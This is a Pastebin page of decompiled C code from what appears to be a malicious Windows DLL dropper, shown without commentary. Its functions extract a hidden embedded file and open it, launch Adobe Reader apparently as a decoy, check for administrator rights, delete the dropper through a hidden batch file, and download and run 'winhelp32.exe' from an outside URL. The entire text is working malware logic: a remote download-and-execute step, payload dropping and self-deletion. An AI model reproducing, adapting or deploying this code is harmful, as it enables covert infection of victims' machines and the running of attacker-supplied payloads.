Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- //----- (100010B0) --------------------------------------------------------
- int __cdecl MakeAndShowEgg()
- {
- _UNKNOWN *v0; // eax@1
- HANDLE v1; // esi@1
- HANDLE v2; // ebp@1
- void *v3; // edi@1
- int result; // eax@5
- DWORD nNumberOfBytesToWrite; // [sp+10h] [bp-2C4h]@1
- LPCSTR lpApplicationName; // [sp+14h] [bp-2C0h]@3
- HKEY hKey; // [sp+18h] [bp-2BCh]@1
- DWORD NumberOfBytesRead; // [sp+1Ch] [bp-2B8h]@1
- DWORD cbData; // [sp+20h] [bp-2B4h]@2
- char v10; // [sp+24h] [bp-2B0h]@1
- int v11; // [sp+28h] [bp-2ACh]@1
- int v12; // [sp+2Ch] [bp-2A8h]@5
- DWORD NumberOfBytesWritten; // [sp+30h] [bp-2A4h]@1
- DWORD Type; // [sp+34h] [bp-2A0h]@2
- struct _STARTUPINFOA StartupInfo; // [sp+38h] [bp-29Ch]@3
- struct _PROCESS_INFORMATION ProcessInformation; // [sp+7Ch] [bp-258h]@3
- char Buffer; // [sp+8Ch] [bp-248h]@1
- CHAR FileName; // [sp+CCh] [bp-208h]@1
- BYTE Data; // [sp+1D0h] [bp-104h]@2
- v0 = sub_10001A0D();
- AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v11, v0);
- GetModuleFileNameA((HMODULE)0x10000000, &FileName, 0x104u);
- v1 = CreateFileA(&FileName, -2147483648u, 0, 0, 3u, 0, 0);
- SetFilePointer(v1, 1024, 0, 0);
- ReadFile(v1, &Buffer, 64u, &NumberOfBytesRead, 0);
- SetFilePointer(v1, 1088, 0, 0);
- ReadFile(v1, &nNumberOfBytesToWrite, 4u, &NumberOfBytesRead, 0);
- v2 = CreateFileA(&Buffer, 0x40000000u, 0, 0, 2u, 0, 0);
- SetFilePointer(v1, 24576, 0, 0);
- v3 = operator new(nNumberOfBytesToWrite);
- ReadFile(v1, v3, nNumberOfBytesToWrite, &NumberOfBytesRead, 0);
- WriteFile(v2, v3, nNumberOfBytesToWrite, &NumberOfBytesWritten, 0);
- CloseHandle(v2);
- operator delete(v3);
- CloseHandle(v1);
- ShellExecuteA(0, "open", &Buffer, 0, 0, 1);
- CString__CString(&v10);
- if ( !RegOpenKeyExA(
- HKEY_LOCAL_MACHINE,
- "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\App Paths\\AcroRd32.exe",
- 0,
- 0x20019u,
- &hKey) )
- {
- cbData = 260;
- if ( !RegQueryValueExA(hKey, ValueName, 0, &Type, &Data, &cbData) )
- {
- CString__CString(&lpApplicationName);
- CString__Format(&lpApplicationName, (const char *)&unk_10003020, &Data);
- memset(&StartupInfo, 0, sizeof(StartupInfo));
- StartupInfo.cb = 68;
- StartupInfo.dwFlags = 1;
- StartupInfo.wShowWindow = 5;
- CreateProcessA(lpApplicationName, 0, 0, 0, 0, 0, 0, 0, &StartupInfo, &ProcessInformation);
- CString___CString(&lpApplicationName);
- }
- RegCloseKey(hKey);
- }
- CString___CString(&v10);
- result = v12;
- *(_DWORD *)(v12 + 4) = v11;
- return result;
- }
- //----- (100012E0) --------------------------------------------------------
- char __cdecl IsAdmin()
- {
- _UNKNOWN *v0; // eax@1
- HANDLE v1; // eax@1
- HANDLE v2; // eax@3
- char result; // al@4
- int v4; // eax@9
- void *v5; // esp@9
- unsigned int v6; // edi@15
- PSID *v7; // ebx@16
- char v8; // [sp+0h] [bp-2Ch]@9
- char v9; // [sp+4h] [bp-28h]@16
- int v10; // [sp+Ch] [bp-20h]@1
- int v11; // [sp+10h] [bp-1Ch]@4
- struct _SID_IDENTIFIER_AUTHORITY pIdentifierAuthority; // [sp+14h] [bp-18h]@1
- PSID pSid; // [sp+1Ch] [bp-10h]@13
- DWORD ReturnLength; // [sp+20h] [bp-Ch]@5
- HANDLE TokenHandle; // [sp+24h] [bp-8h]@1
- char v16; // [sp+2Bh] [bp-1h]@15
- v0 = sub_10001A0D();
- AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v10, v0);
- pIdentifierAuthority.Value[0] = 0;
- pIdentifierAuthority.Value[1] = 0;
- pIdentifierAuthority.Value[2] = 0;
- pIdentifierAuthority.Value[3] = 0;
- pIdentifierAuthority.Value[4] = 0;
- pIdentifierAuthority.Value[5] = 5;
- v1 = GetCurrentThread();
- if ( !OpenThreadToken(v1, 8u, 0, &TokenHandle) )
- {
- if ( GetLastError() != 1008 )
- {
- LABEL_12:
- result = 0;
- *(_DWORD *)(v11 + 4) = v10;
- return result;
- }
- v2 = GetCurrentProcess();
- if ( !OpenProcessToken(v2, 8u, &TokenHandle) )
- {
- *(_DWORD *)(v11 + 4) = v10;
- return 0;
- }
- }
- if ( GetTokenInformation(TokenHandle, TokenGroups, 0, 0, &ReturnLength) )
- {
- *(_DWORD *)(v11 + 4) = v10;
- return 0;
- }
- if ( GetLastError() != 122 )
- {
- result = 0;
- *(_DWORD *)(v11 + 4) = v10;
- return result;
- }
- v4 = ReturnLength + 3;
- LOBYTE(v4) = (ReturnLength + 3) & 0xFC;
- v5 = alloca(v4);
- if ( !&v8 )
- {
- *(_DWORD *)(v11 + 4) = v10;
- return 0;
- }
- if ( !GetTokenInformation(TokenHandle, TokenGroups, &v8, ReturnLength, &ReturnLength) )
- goto LABEL_12;
- if ( AllocateAndInitializeSid(&pIdentifierAuthority, 2u, 0x20u, 0x220u, 0, 0, 0, 0, 0, 0, &pSid) )
- {
- v6 = 0;
- v16 = 0;
- if ( *(_DWORD *)&v8 )
- {
- v7 = (PSID *)&v9;
- while ( !EqualSid(*v7, pSid) )
- {
- ++v6;
- v7 += 2;
- if ( v6 >= *(_DWORD *)&v8 )
- goto LABEL_21;
- }
- v16 = 1;
- }
- LABEL_21:
- FreeSid(pSid);
- result = v16;
- *(_DWORD *)(v11 + 4) = v10;
- }
- else
- {
- *(_DWORD *)(v11 + 4) = v10;
- result = 0;
- }
- return result;
- }
- //----- (10001490) --------------------------------------------------------
- int __cdecl DeleteMyself()
- {
- signed int v0; // ecx@1
- int v1; // edi@1
- _UNKNOWN *v2; // eax@1
- char v3; // zf@3
- signed int v4; // ecx@5
- signed int v5; // ecx@5
- unsigned int v6; // ebx@5
- CHAR *v7; // edi@5
- const void *v8; // esi@5
- char v9; // zf@7
- HANDLE v10; // esi@9
- int v11; // eax@10
- HANDLE v12; // eax@11
- HANDLE v13; // eax@11
- int result; // eax@12
- int v15; // [sp+Ch] [bp-650h]@1
- int v16; // [sp+10h] [bp-64Ch]@12
- struct _PROCESS_INFORMATION ProcessInformation; // [sp+14h] [bp-648h]@10
- DWORD NumberOfBytesWritten; // [sp+24h] [bp-638h]@10
- struct _STARTUPINFOA StartupInfo; // [sp+28h] [bp-634h]@10
- CHAR FileName; // [sp+6Ch] [bp-5F0h]@1
- CHAR String2; // [sp+170h] [bp-4ECh]@1
- CHAR String; // [sp+274h] [bp-3E8h]@10
- v2 = sub_10001A0D();
- AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v15, v2);
- GetModuleFileNameA((HMODULE)0x10000000, &String2, 0x104u);
- lstrcpyA(&FileName, &String2);
- *strrchr(&FileName, 92) = 0;
- v1 = (int)"\\DMS.bat";
- v0 = -1;
- do
- {
- if ( !v0 )
- break;
- v3 = *(_BYTE *)v1++ == 0;
- --v0;
- }
- while ( !v3 );
- v5 = ~v0;
- v8 = (const void *)(v1 - v5);
- v6 = v5;
- v7 = &FileName;
- v4 = -1;
- do
- {
- if ( !v4 )
- break;
- v9 = *v7++ == 0;
- --v4;
- }
- while ( !v9 );
- memcpy(v7 - 1, v8, v6);
- v10 = CreateFileA(&FileName, 0x40000000u, 0, 0, 2u, 0x8000080u, 0);
- if ( v10 != (HANDLE)-1 )
- {
- wsprintfA(
- &String,
- ":Repeat\r\nDEL \"%s\"\r\nif exist \"%s\" goto Repeat\r\nDEL \"%s\"\r\n",
- &String2,
- &String2,
- &FileName);
- v11 = lstrlenA(&String);
- WriteFile(v10, &String, v11, &NumberOfBytesWritten, 0);
- CloseHandle(v10);
- memset(&StartupInfo, 0, sizeof(StartupInfo));
- StartupInfo.wShowWindow = 0;
- StartupInfo.cb = 68;
- StartupInfo.dwFlags = 1;
- if ( CreateProcessA(0, &FileName, 0, 0, 0, 0x44u, 0, L"\\", &StartupInfo, &ProcessInformation) )
- {
- SetThreadPriority(ProcessInformation.hThread, -15);
- v12 = GetCurrentThread();
- SetThreadPriority(v12, 15);
- v13 = GetCurrentProcess();
- SetPriorityClass(v13, 0x80u);
- CloseHandle(ProcessInformation.hProcess);
- ResumeThread(ProcessInformation.hThread);
- CloseHandle(ProcessInformation.hThread);
- }
- }
- GetLastError();
- PostQuitMessage(0);
- result = v16;
- *(_DWORD *)(v16 + 4) = v15;
- return result;
- }
- //----- (100017A0) --------------------------------------------------------
- char __cdecl StartUp()
- {
- _UNKNOWN *v0; // eax@1
- int v2; // [sp+0h] [bp-10Ch]@1
- int v3; // [sp+4h] [bp-108h]@3
- CHAR PathName; // [sp+8h] [bp-104h]@1
- v0 = sub_10001A0D();
- AFX_MAINTAIN_STATE2__AFX_MAINTAIN_STATE2(&v2, v0);
- SHGetSpecialFolderPathA(0, &PathName, 26, 0);
- SetCurrentDirectoryA(&PathName);
- if ( (unsigned __int8)DownloadFile("winhelp32.exe", (int)"http://academyhouse.us/from/wincrng.exe") )
- WinExec("winhelp32.exe", 5u);
- MakeAndShowEgg();
- DeleteMyself();
- *(_DWORD *)(v3 + 4) = v2;
- return 1;
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement